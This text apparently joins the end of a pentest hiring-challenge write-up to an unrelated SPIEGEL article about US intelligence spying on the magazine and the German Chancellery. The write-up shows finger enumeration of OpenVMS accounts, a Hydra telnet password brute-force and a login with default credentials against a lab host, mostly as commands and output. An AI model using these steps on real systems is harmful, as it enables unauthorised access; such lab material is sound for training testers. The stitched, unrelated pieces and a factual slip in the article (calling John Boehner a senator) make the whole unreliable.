root@s2crew:~# for i in `cat tmp.txt`;do finger $i@10.10.82.200;done [10.10.82.200] Username Program Login Term/Location SYSTEM $ Sun 02:21   Login name: SYSTEM In real life: SYSTEM MANAGER Account: SYSTEM Directory: SYS$SYSROOT:[SYSMGR] Last login: Tue 10-DEC-2013 19:17:20 No Plan. [10.10.82.200] Login name: FIELD In real life: FIELD SERVICE Account: FIELD Directory: SYS$SYSROOT:[SYSMAINT] Last login: [Never logged in] No Plan. [10.10.82.200] Login name: SUPPORT In real life: ??? [10.10.82.200] Login name: SYSMAINT In real life: ??? [10.10.82.200] Login name: SYSTEST In real life: SYSTEST-UETP Account: SYSTEST Directory: SYS$SYSROOT:[SYSTEST] Last login: [Never logged in] No Plan. [10.10.82.200] Login name: SYSTEST_CLIG In real life: ??? [10.10.82.200] Login name: DEFAULT In real life: ??? [10.10.82.200] Login name: DECNET In real life: ??? [10.10.82.200] Login name: OPERATIONS In real life: ??? [10.10.82.200] Login name: USER In real life: ??? [10.10.82.200] Login name: LIBRARY In real life: LIBRARY Account: LIBRARY Directory: SYS$SYSDEVICE:[LIBRARY] Last login: Tue 10-DEC-2013 19:49:55 No Plan. [10.10.82.200] Login name: GUEST In real life: ??? [10.10.82.200] Login name: DEMO In real life: DEMO Account: DEMO Directory: SYS$SYSDEVICE:[DEMO] Last login: Tue 10-DEC-2013 19:43:11 No Plan. [10.10.82.200] Login name: HYTELNET In real life: ???

There are lots of default user accounts in the system. Let’s see the default username/password combinations:

root@s2crew:~# hydra -L tmp.txt -e nsr -p 123456 telnet://10.10.82.200 Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only   Hydra (http://www.thc.org/thc-hydra) starting at 2015-03-25 11:14:40 [WARNING] telnet is by its nature unreliable to analyze reliable, if possible better choose FTP or SSH if available [DATA] 16 tasks, 1 server, 60 login tries (l:15/p:4), ~3 tries per task [DATA] attacking service telnet on port 23 [STATUS] 37.00 tries/min, 37 tries in 00:01h, 23 todo in 00:01h, 16 active [23][telnet] host: 10.10.82.200 login: LIBRARY password: LIBRARY [STATUS] attack finished for 10.10.82.200 (waiting for children to finish) 1 of 1 target successfuly completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2015-03-25 11:16:19

The candidate could log in with the LIBRARY/LIBRARY account into the system:

root@s2crew:~# telnet 10.10.82.200 Trying 10.10.82.200... Connected to 10.10.82.200. Escape character is '^]'.     Welcome to OpenVMS (TM) VAX Operating System, Version V7.3   Username: LIBRARY Password: Welcome to OpenVMS (TM) VAX Operating System, Version V7.3 Last interactive login on Tuesday, 10-DEC-2013 20:07 1 failure since last successful login $

After the successful log in, simply read the proof.txt from the sys root:

$ type SYS$SYSROOT:[000000]proof.txt Silent Signal is really proud of you ;) cad77c7dffc10fcacc77ff0690f2897a

Done! This kind of attack is really old and common; it takes approximately 5 to 10 minutes. We wanted to make sure that the candidate

• was not of afraid exotic or unknown systems,
• knew basic hacking concepts, and
• could use Google.

None of the candidates could solve this task!

Summary

For the report writing, the candidate should have used a search engine like Google. Some relevant and good results from the first page of the penetration testing report query:
https://www.offensive-security.com/offsec/penetration-test-report-2013
https://www.offensive-security.com/pwbonline/PWBv3-REPORT.doc
http://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343
http://resources.infosecinstitute.com/writing-penetration-testing-reports
http://www.pentest-standard.org/index.php/Reporting
Most people were never heard from again, two guys thanked us for the chance, and few candidates submitted an actual report.
The challenges were simple and common pentesting tasks. Most contestants couldn’t think like a professional hacker, but the bigger problem was that they couldn’t seem to use Google either. This is really surprising since some CVs were really impressive, including good research and relevant experience at international security companies. It quickly turned out though that a nice reference doesn’t replace hands-on experience. Most approached the challenges in a wrong way that suggests a lack of general concepts w.r.t systems security.
For those who want to make a career in penetration testing, we have two suggestions: Try harder and never stop learning!
For those who want to hire pentesters: In this profession papers are poor indicators. Real skills show themselves during real exercises.
And finally from our side: We are really, really disappointed :(
The Silent Signal pentest crew

An Attack on Press Freedom: SPIEGEL Targeted by US Intelligence

http://www.spiegel.de/international/germany/the-nsa-and-american-spies-targeted-spiegel-a-1042023.html


Walks during working hours aren't the kind of pastime one would normally expect from a leading official in the German Chancellery. Especially not from the head of Department Six, the official inside Angela Merkel's office responsible for coordinating Germany's intelligence services.

But in the summer of 2011, Günter Heiss found himself stretching his legs for professional reasons. The CIA's station chief in Berlin had requested a private conversation with Heiss. And he didn't want to meet in an office or follow standard protocol. Instead, he opted for the kind of clandestine meeting you might see in a spy film.

Officially, the CIA man was accredited as a counsellor with the US Embassy, located next to Berlin's historic Brandenburg Gate. Married to a European, he had already been stationed in Germany once before and knew how to communicate with German officials. At times he could be demanding and overbearing, but he could also be polite and courteous. During this summer walk he also had something tangible to offer Heiss.

The CIA staffer revealed that a high-ranking Chancellery official allegedly maintained close contacts with the media and was sharing official information with reporters with SPIEGEL.

The American provided the name of the staffer: Hans Josef Vorbeck, Heiss' deputy in Department Six. The information must have made it clear to Heiss that the US was spying on the German government as well as the press that reports on it.

The central Berlin stroll remained a secret for almost four years. The Chancellery quietly transferred Vorbeck, who had until then been responsible for counterterrorism, to another, less important department responsible dealing with the history of the BND federal intelligence agency. Other than that, though, it did nothing.

Making a Farce of Rule of Law

Officials in the Chancellery weren't interested in how the CIA had obtained its alleged information. They didn't care to find out how, and to which degree, they were being spied on by the United States. Nor were they interested in learning about the degree to which SPIEGEL was being snooped on by the Americans. Chancellery officials didn't contact any of the people in question. They didn't contact members of the Bundestag federal parliament sitting on the Parliamentary Control Panel, the group responsible for oversight of the intelligence services. They didn't inform members of the Office for the Protection of the Constitution, the agency responsible for counterintelligence in Germany, either. And they didn't contact a single public prosecutor. Angela Merkel's office, it turns out, simply made a farce of the rule of law.

As a target of the surveillance, SPIEGEL has requested more information from the Chancellery. At the same time, the magazine filed a complaint on Friday with the Federal Public Prosecutor due to suspicion of intelligence agency activity.

Because now, in the course of the proceedings of the parliamentary investigative committee probing the NSA's activities in Germany in the wake of revelations leaked by whistleblower Edward Snowden, details about the event that took place in the summer of 2011 are gradually leaking to the public. At the beginning of May, the mass-circulation tabloid Bild am Sonntag reported on a Chancellery official who had been sidelined "in the wake of evidence of alleged betrayal of secrets through US secret services."

Research conducted by SPIEGEL has determined the existence of CIA and NSA files filled with a large number of memos pertaining to the work of the German newsmagazine. And three different government sources in Berlin and Washington have independently confirmed that the CIA station chief in Berlin was referring specifically to Vorbeck's contacts with SPIEGEL.

An Operation Justified by Security Interests?

Obama administration sources with knowledge of the operation said that it was justified by American security interests. The sources said US intelligence services had determined the existence of intensive contacts between SPIEGEL reporters and the German government and decided to intervene because those communications were viewed as damaging to the United States' interests. The fact that the CIA and NSA were prepared to reveal an ongoing surveillance operation to the Chancellery underlines the importance they attached to the leaks, say sources in Washington. The NSA, the sources say, were aware that the German government would know from then on that the US was spying in Berlin.

As more details emerge, it is becoming increasingly clear that representatives of the German government at best looked away as the Americans violated the law, and at worst supported them.

Just last Thursday, Günter Heiss and his former supervisor, Merkel's former Chief of Staff Ronald Pofalla, were questioned by the parliamentary investigative committee and attempted to explain the egregious activity. Heiss confirmed that tips had been given, but claimed they hadn't been "concrete enough" for measures to be taken. When asked if he had been familiar with the issue, Pofalla answered, "Of course." He said that anything else he provided had to be "in context," at which point a representative of the Chancellery chimed in and pointed out that could only take place in a meeting behind closed doors.

Former Chancellery chief Ronald Pofalla during questioning before the parliamentary committee investigating the NSA affair in Berlin. "Of course" he had been familiar with the issue, the former senior Merkel staffer said. Zoom
HC Plambeck/DER SPIEGEL

Former Chancellery chief Ronald Pofalla during questioning before the parliamentary committee investigating the NSA affair in Berlin. "Of course" he had been familiar with the issue, the former senior Merkel staffer said.
In that sense, the meeting of the investigative committee once again shed light on the extent to which the balance of power has shifted between the government and the Fourth Estate. Journalists, who scrutinize and criticize those who govern, are an elementary part of the "checks and balances" -- an American invention -- aimed at ensuring both transparency and accountability. When it comes to intelligence issues, however, it appears this system has been out of balance for some time.

Government Lies

When SPIEGEL first reported in Summer 2013 about the extent of NSA's spying on Germany, German politicians first expressed shock and then a certain amount of indignation before quickly sliding back into their persona as a loyal ally. After only a short time and a complete lack of willingness on the part of the Americans to explain their actions, Pofalla declared that the "allegations are off the table."

But a number of reports published in recent months prove that, whether out of fear, outrage or an alleged lack of knowledge, it was all untrue. Everything the government said was a lie. As far back as 2013, the German government was in a position to suspect, if not to know outright, the obscene extent to which the United States was spying on an ally. If there hadn't already been sufficient evidence of the depth of the Americans' interest in what was happening in Berlin, Wednesday's revelations by WikiLeaks, in cooperation with Süddeutsche Zeitung, filled in the gaps.

SPIEGEL's reporting has long been a thorn in the side of the US administration. In addition to its reporting on a number of other scandals, the magazine exposed the kidnapping of Murat Kurnaz, a man of Turkish origin raised in Bremen, Germany, and his rendition to Guantanamo. It exposed the story of Mohammed Haydar Zammar, who was taken to Syria, where he was tortured. The reports triggered the launch of a parliamentary investigative committee in Berlin to look also into the CIA's practices.

When SPIEGEL reported extensively on the events surrounding the arrest of three Islamist terrorists in the so-called "Sauerland cell" in Germany, as well as the roles played by the CIA and the NSA in foiling the group, the US government complained several times about the magazine. In December 2007, US intelligence coordinator Mike McConnell personally raised the issue during a visit to Berlin. And when SPIEGEL reported during the summer of 2009, under the headline "Codename Domino," that a group of al-Qaida supporters was believed to be heading for Europe, officials at the CIA seethed. The sourcing included a number of security agencies and even a piece of information supplied by the Americans. At the time, the station chief for Germany's BND intelligence service stationed in Washington was summoned to CIA headquarters in Langley, Virginia.

The situation escalated in August 2010 after SPIEGEL, together with WikiLeaks, the Guardian and the New York Times, began exposing classified US Army reports from Afghanistan. That was followed three months later with the publication of the Iraq war logs based on US Army reports. And in November of that year, WikiLeaks, SPIEGEL and several international media reported how the US government thinks internally about the rest of the world on the basis of classified State Department cables. Pentagon officials at the time declared that WikiLeaks had "blood on its hands." The Justice Department opened an investigation and seized data from Twitter accounts, e-mail exchanges and personal data from activists connected with the whistleblowing platform. The government then set up a Task Force with the involvement of the CIA and NSA.

Not even six months later, the CIA station chief requested to go on the walk in which he informed the intelligence coordinator about Vorbeck and harshly criticized SPIEGEL.

Digital Snooping

Not long later, a small circle inside the Chancellery began discussing how the CIA may have got ahold of the information. Essentially, two possibilities were conceivable: either through an informant or through surveillance of communications. But how likely is it that the CIA had managed to recruit a source in the Chancellery or on the editorial staff of SPIEGEL?

The more likely answer, members of the circle concluded, was that the information must have been the product of "SigInt," signals intelligence -- in other words, wiretapped communications. It seems fitting that during the summer of 2013, just prior to the scandal surrounding Edward Snowden and the documents he exposed pertaining to NSA spying, German government employees warned several SPIEGEL journalists that the Americans were eavesdropping on them.

At the end of June 2011, Heiss then flew to Washington. During a visit to CIA headquarters in Langley, the issue of the alleged contact with SPIEGEL was raised again. Chancellery staff noted the suspicion in a classified internal memo that explicitly names SPIEGEL.

Chancellor Merkel's former intelligence coordinator Günter Heiss has claimed that information provided by the CIA wasn't "concrete" enough for the German government to take action. Zoom
HC Plambeck/DER SPIEGEL

Chancellor Merkel's former intelligence coordinator Günter Heiss has claimed that information provided by the CIA wasn't "concrete" enough for the German government to take action.
One of the great ironies of the story is that contact with the media was one of Vorbeck's job responsibilities. He often took part in background discussions with journalists and even represented the Chancellery at public events. "I had contact with journalists and made no secret about it," Vorbeck told SPIEGEL. "I even received them in my office in the Chancellery. That was a known fact." He has since hired a lawyer.

It remains unclear just who US intelligence originally had in its scopes. The question is also unlikely to be answered by the parliamentary investigative committee, because the US appears to have withheld this information from the Chancellery. Theoretically, at least, there are three possibilities: The Chancellery -- at least in the person of Hans Josef Vorbeck. SPIEGEL journalists. Or blanket surveillance of Berlin's entire government quarter. The NSA is capable of any of the three options. And it is important to note that each of these acts would represent a violation of German law.

Weak Arguments

So far, the Chancellery has barricaded itself behind the argument that the origin of the information had been too vague and abstract to act on. In addition, the tip had been given in confidentiality, meaning that neither Vorbeck nor SPIEGEL could be informed. But both are weak arguments, given that the CIA station chief's allegations were directed precisely at SPIEGEL and Vorbeck and that the intelligence coordinator's deputy would ultimately be sidelined as a result.

And even if you follow the logic that the tip wasn't concrete enough, there is still one committee to whom the case should have been presented under German law: the Bundestag's Parliamentary Control Panel, whose proceedings are classified and which is responsible for oversight of Germany's intelligence services. The nine members of parliament on the panel are required to be informed about all intelligence events of "considerable importance."

Members of parliament on the panel did indeed express considerable interest in the Vorbeck case. They learned in fall 2011 of his transfer, and wanted to know why "a reliable coordinator in the fight against terrorism would be shifted to a post like that, one who had delivered excellent work on the issue," as then chairman of the panel, Social Demoratic Party politician Thomas Oppermann, criticized at the time.

But no word was mentioned about the reasons behind the transfer during a Nov. 9, 2011 meeting of the panel. Not a single word about the walk taken by the CIA chief of station. Not a word about the business trip to Washington taken by Günter Heiss afterward. And not a word about Vorbeck's alleged contacts with SPIEGEL. Instead, the parliamentarians were told a myth -- that the move had been made necessary by cutbacks. And also because he was needed to work on an historical appraisal of Germany's foreign intelligence agency, the BND.

Deceiving Parliament

Officials in the Chancellery had decided to deceive parliament about the issue. And for a long time, it looked as though they would get away with it.

The appropriate way of dealing with the CIA's incrimination would have been to transfer the case to the justice system. Public prosecutors would have been forced to follow up with two investigations: One to find out whether the CIA's allegations against Vorbeck had been true -- both to determine whether government secrets had been breached and out of the obligation to assist a longtime civil servant. It also would have had to probe suspicions that a foreign intelligence agency conducted espionage in the heart of the German capital.

That could, and should, have been the case. Instead, the Chancellery decided to go down the path of deception, scheming with an ally, all the while interpreting words like friendship and partnership in a highly arbitrary and scrupulous way.

Günter Heiss, who received the tip from the CIA station chief, is an experienced civil servant. In his earlier years, Heiss studied music. He would go on as a music instructor to teach a young Ursula von der Leyen (who is Germany's defense minister today) how to play the piano. But then Heiss, a tall, slightly lanky man, switched professions and instead pursued a career in intelligence that would lead him to the top post in the Lower Saxony state branch of the Office for the Protection of the Constitution. Even back then, the Christian Democrat was already covering up the camera on his laptop screen with tape. At the very least "they" shouldn't be able to see him, he said at the time, elaborating that the "they" he was referring to should not be interpreted as being the US intelligence services, but rather the other spies - "the Chinese" and, "in any case, the Russians." For conservatives like Heiss, America, after all, is friendly territory.

'Spying Among Friends Not Acceptable'

If there was suspicion in the summer of 2011 that the NSA was spying on a staff member at the Chancellery, it should have set off alarm bells within the German security apparatus. Both the Office for the Protection of the Constitution, which is responsible for counter-intelligence, and the Federal Office for Information Security should have been informed so that they could intervene. There also should have been discussions between the government ministers and the chancellor in order to raise government awareness about the issue. And, going by the maxim the chancellor would formulate two years later, Merkel should have had a word with the Americans along the lines of "Spying among friends is not acceptable."

And against the media.

German Chancellor Angela Merkel with US President Barack Obama at the recent G7 summit in Garmisch-Partenkirchen, Germany: A huge question mark over press freedom in Germany Zoom
AFP

German Chancellor Angela Merkel with US President Barack Obama at the recent G7 summit in Garmisch-Partenkirchen, Germany: A huge question mark over press freedom in Germany
If it is true that a foreign intelligence agency spied on journalists as they conducted their reporting in Germany and then informed the Chancellery about it, then these actions would place a huge question mark over the notion of a free press in this country. Germany's highest court ruled in 2007 that press freedom is a "constituent part of a free and democratic order." The court held that reporting can no longer be considered free if it entails a risk that journalists will be spied on during their reporting and that the federal government will be informed of the people they speak to.

"Freedom of the press also offers protection from the intrusion of the state in the confidentiality of the editorial process as well as the relationship of confidentiality between the media and its informants," the court wrote in its ruling. Freedom of the press also provides special protection to the "the secrecy of sources of information and the relationship of confidentiality between the press, including broadcasters, and the source."

Criminalizing Journalism

But Karlsruhe isn't Washington. And freedom of the press is not a value that gives American intelligence agencies pause. On the contrary, the Obama administration has gained a reputation for adamantly pursuing uncomfortable journalistic sources. It hasn't even shied away from targeting American media giants.

In spring 2013, it became known that the US Department of Justice mandated the monitoring of 100 telephone numbers belonging to the news agency Associated Press. Based on the connections that had been tapped, AP was able to determine that the government likely was interested in determining the identity of an important informant. The source had revealed to AP reporters details of a CIA operation pertaining to an alleged plot to blow up a commercial jet.

The head of AP wasn't the only one who found the mass surveillance of his employees to be an "unconstitutional act." Even Republican Senators like John Boehner sharply criticized the government, pointing to press freedoms guaranteed by the Bill of Rights. "The First Amendment is first for a reason," he said.

But the Justice Department is unimpressed by such formulations. New York Times reporter James Risen, a two-time Pulitzer Prize winner, was threatened with imprisonment for contempt of court in an effort to get him to turn over his sources -- which he categorically refused to do for seven years. Ultimately, public pressure became too intense, leading Obama's long-time Attorney General Eric Holder to announce last October that Risen would not be forced to testify.

The Justice Department was even more aggressive in its pursuit of James Rosen, the Washington bureau chief for TV broadcaster Fox. In May 2013, it was revealed that his telephone was bugged, his emails were read and his visits to the State Department were monitored. To obtain the necessary warrants, the Justice Department had labeled Rosen a "criminal co-conspirator."

The strategy of criminalizing journalism has become something of a bad habit under Obama's leadership, with his government pursuing non-traditional media, such as the whistleblower platform WikiLeaks, with particular aggression.

Bradley Manning, who supplied WikiLeaks with perhaps its most important data dump, was placed in solitary confinement and tormented with torture-like methods, as the United Nations noted critically. Manning is currently undergoing a gender transition and now calls herself Chelsea. In 2013, a military court sentenced Manning, who, among other things, publicized war crimes committed by the US in Iraq, to 35 years in prison.

In addition, a criminal investigation has been underway for at least the last five years into the platform's operators, first and foremost its founder Julian Assange. For the past several years, a grand jury in Alexandria, Virginia has been working to determine if charges should be brought against the organization.

Clandestine Proceedings

The proceedings are hidden from the public, but the grand jury's existence became apparent once it began to subpoena witnesses with connections to WikiLeaks and when the Justice Department sought to confiscate data belonging to people who worked with Assange. The US government, for example, demanded that Twitter hand over data pertaining to several people, including the Icelandic parliamentarian Brigitta Jonsdottir, who had worked with WikiLeaks on the production of a video. The short documentary is an exemplary piece of investigative journalism, showing how a group of civilians, including employees of the news agency Reuters, were shot and killed in Baghdad by an American Apache helicopter.

Computer security expert Jacob Appelbaum, who occasionally freelances for SPIEGEL, was also affected at the time. Furthermore, just last week he received material from Google showing that the company too had been forced by the US government to hand over information about him - for the time period from November 2009 until today. The order would seem to indicate that investigators were particularly interested in Appelbaum's role in the publication of diplomatic dispatches by WikiLeaks.

Director of National Intelligence James Clapper has referred to journalists who worked with material provided by Edward Snowden has his "accomplices." In the US, there are efforts underway to pass a law pertaining to so-called "media leaks." Australia already passed one last year. Pursuant to the law, anyone who reveals details about secret service operations may be punished, including journalists.

Worries over 'Grave Loss of Trust'

The German government isn't too far from such positions either. That has become clear with its handling of the strictly classified list of "selectors," which is held in the Chancellery. The list includes search terms that Germany's foreign intelligence agency, the BND, used when monitoring telecommunications data on behalf of the NSA. The parliamentary investigative committee looking into NSA activity in Germany has thus far been denied access to the list. The Chancellery is concerned that allowing the committee to review the list could result in uncomfortable information making its way into the public.

The roof of the US Embassy in Berlin appears in the foreground, with the cupola of the German parliament building, the Reichstag, in the background. It is believed the US conducted esponiage from its Berlin Embassy. Zoom
DPA

The roof of the US Embassy in Berlin appears in the foreground, with the cupola of the German parliament building, the Reichstag, in the background. It is believed the US conducted esponiage from its Berlin Embassy.
That's something Berlin would like to prevent. Despite an unending series of indignities visited upon Germany by US intelligence agencies, the German government continues to believe that it has a "special" relationship with its partners in America -- and is apparently afraid of nothing so much as losing this partnership.

That, at least, seems to be the message of a five-page secret letter sent by Chancellery Chief of Staff Peter Altmaier, of Merkel's Christian Democrats, to various parliamentary bodies charged with oversight. In the June 17 missive, Altmaier warns of a "grave loss of trust" should German lawmakers be given access to the list of NSA spying targets. Opposition parliamentarians have interpreted the letter as a "declaration of servility" to the US.

Altmaier refers in the letter to a declaration issued by the BND on April 30. It notes that the spying targets passed on by the NSA since 2005 include "European political personalities, agencies in EU member states, especially ministries and EU institutions, and representations of certain companies." On the basis of this declaration, Altmaier writes, "the investigative committee can undertake its own analysis, even without knowing the individual selectors."

Committee members have their doubts. They suspect that the BND already knew at the end of April what WikiLeaks has now released -- with its revelations that the German Economics Ministry, Finance Ministry and Agriculture Ministry were all under the gaze of the NSA, among other targets. That would mean that the formulation in the BND declaration of April 30 was intentionally misleading. The Left Party and the Greens now intend to gain direct access to the selector list by way of a complaint to Germany's Constitutional Court.

The government in Berlin would like to prevent exactly that. The fact that the US and German intelligence agencies shared selectors is "not a matter of course. Rather, it is a procedure that requires, and indicates, a special degree of trust," Almaier writes. Should the government simply hand over the lists, Washington would see that as a "profound violation of confidentiality requirements." One could expect, he writes, that the "US side would significantly restrict its cooperation on security issues, because it would no longer see its German partners as sufficiently trustworthy."

Altmaier's letter neglects to mention the myriad NSA violations committed against German interests, German citizens and German media.